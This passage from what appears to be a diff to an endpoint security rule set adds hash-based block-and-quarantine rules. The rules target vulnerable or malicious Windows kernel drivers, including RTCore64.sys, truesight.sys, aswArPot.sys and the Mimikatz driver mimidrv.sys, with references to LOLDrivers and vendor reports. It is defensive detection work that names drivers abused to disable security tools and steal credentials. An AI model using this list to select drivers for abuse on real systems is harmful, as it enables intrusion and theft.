+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36b9e31240ab0341873c7092b63e2e0f2cab2962ebf9b25271c3a1216b7669eb",
+ "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "810f4c65-b5ee-5fa9-a79e-a5095447766c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143918Z",
+ "creation_date": "2026-03-23T11:45:32.143920Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143925Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a490a57a8f57ae27571629197bb652b0f4c84f9414d09bf6cfe2ee1b175101b4",
+ "comment": "Vulnerable Kernel Driver (aka Afd.sys) [https://www.loldrivers.io/drivers/394f49b2-2d78-4d0d-b374-1399695455f3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "811b3a74-d768-5f61-baa1-75ed8525f0be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607685Z",
+ "creation_date": "2026-03-23T11:45:29.607687Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607692Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f5dc63e5742096e4accaca39ae77a2a2142b438c10f97860dee4054b51d3b35",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "811dd858-c6e4-5fd1-aa2d-c3975c507389",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480729Z",
+ "creation_date": "2026-03-23T11:45:31.480733Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480742Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ebb1a48c4eb16cd6213898edeb48d00a0c0fe1884b204f6b56dd9f4356f7bf8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8125580b-1172-57ea-af15-c325cb5ef891",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818737Z",
+ "creation_date": "2026-03-23T11:45:31.818741Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818749Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e510d0ef684a52cf4871520cb9ac2c4d289d0717ba9bd3a33739aab433b252b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "813d3e30-0f9e-5d35-a841-8fbf23a5a12e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.161057Z",
+ "creation_date": "2026-03-23T11:45:31.161059Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.161065Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fc7b3f9ed8b3b21684d8691d5c4486bc6e39dabca6f293ae2205cd647e8793f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "814bdd15-d6e6-5f47-b863-1552fb334b95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970529Z",
+ "creation_date": "2026-03-23T11:45:29.970531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2456a7921fa8ab7b9779e5665e6b42fccc019feb9e49a9a28a33ec0a4bb323c4",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8154ed8d-78d0-5e50-b64e-f71e82d1e39c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976588Z",
+ "creation_date": "2026-03-23T11:45:29.976590Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976595Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29bf8618816bce5fa2845409d98b7b96915e0763bb04719535ca885e4713cfaf",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81572d04-d2a4-5e42-98a2-71372cc5a680",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155345Z",
+ "creation_date": "2026-03-23T11:45:31.155347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155353Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01423a32ba9f1f1a6652104b4123420ca0f63c0a5ad74f69e53aa553360f86c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81577f0e-291a-5ef4-a6fe-625027aed9a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484087Z",
+ "creation_date": "2026-03-23T11:45:31.484092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484100Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c67887a7bc5ae3d94cafa31901e8fcf3e2f0d2ecb33f6639066588bd721e9d2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8168b6b5-2944-53a0-8947-77355df1d3dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455473Z",
+ "creation_date": "2026-03-23T11:45:30.455476Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455485Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e9e9e0b9a23deec5f28dc45f0bbe7423565f037f74be2957e82e5f72c886094",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "816b1a64-668e-5a57-ac77-e38a9ff15280",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980734Z",
+ "creation_date": "2026-03-23T11:45:29.980736Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980741Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aab97fb324c883f1de71112e1d9fb716cef40636e39a3b9f4a5b8678cf7bde3f",
+ "comment": "Vulnerable Kernel Driver (aka CtiIo64.sys) [https://www.loldrivers.io/drivers/de365e80-45cb-48fb-af6e-0a96a5ad7777/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "816bcbb4-3406-5e44-a44a-3bd00ab98b2e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142238Z",
+ "creation_date": "2026-03-23T11:45:31.142240Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142245Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7755e3bdac09106370c5676a332bf800f5790d0cf1cfc58c634127630a08f045",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "818a71b5-49cd-5e4a-b4c3-112d9eefa02a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818613Z",
+ "creation_date": "2026-03-23T11:45:30.818615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33bc9a17a0909e32a3ae7e6f089b7f050591dd6f3f7a8172575606bec01889ef",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8194e364-2d52-5277-9444-20364437d672",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146528Z",
+ "creation_date": "2026-03-23T11:45:31.146531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "206264f6d4f14ca8e4f721c5f954d78c8f23546afafd3f6542e23c86fdffc572",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "819b1411-f51b-5f15-9299-e19e41ec8fd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975535Z",
+ "creation_date": "2026-03-23T11:45:29.975537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975542Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b37b3c6877b70289c0f43aeb71349f7344b06063996e6347c3c18d8c5de77f3b",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "819c4ced-872c-5689-808a-2138d989a314",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831344Z",
+ "creation_date": "2026-03-23T11:45:30.831347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "868a5cbf26acfa167dc582dee9e8b9449b708a2242ddb2f858f079dcb897f5ab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81a05c2c-15d3-5275-a79a-bbf3b83913ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465892Z",
+ "creation_date": "2026-03-23T11:45:30.465896Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465904Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "704c6ffe786bc83a73fbdcd2edd50f47c3b5053da7da6aa4c10324d389a31db4",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81a9fb1d-f1fe-527f-bc77-48da8dcc0e20",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816499Z",
+ "creation_date": "2026-03-23T11:45:31.816502Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816510Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ec92bab224368247d83a9faa46b771fcfaf43480904d23ff06bea5d77f3eb3c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81b88910-51c6-5d1a-8c1e-1cd71b4543f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484116Z",
+ "creation_date": "2026-03-23T11:45:31.484119Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484128Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "379c0d846b505affc22a61bc5ccfc3f58c51321ab733342c6f94a1d0c8e9463e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c20eb7-0904-5b6b-ba49-480d37e16bf0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969470Z",
+ "creation_date": "2026-03-23T11:45:29.969472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969478Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5512aea158c30e4f52c1e27136c1c803c98388d1d8c7269e497728fd0b57d9f5",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c311b2-2334-5add-a7fe-6e86066bd453",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482621Z",
+ "creation_date": "2026-03-23T11:45:31.482626Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482635Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d79be2d97137276e5cf9fb07fef8df72dd20701e1ff4e7ec9180a8ff5567aa50",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c4c3e5-12cc-5826-8252-c03f54af80d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142700Z",
+ "creation_date": "2026-03-23T11:45:31.142702Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48363eb346fff1e20a8eca484e6447cb232ec8ae009555631bf7c7d7a97b15c8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
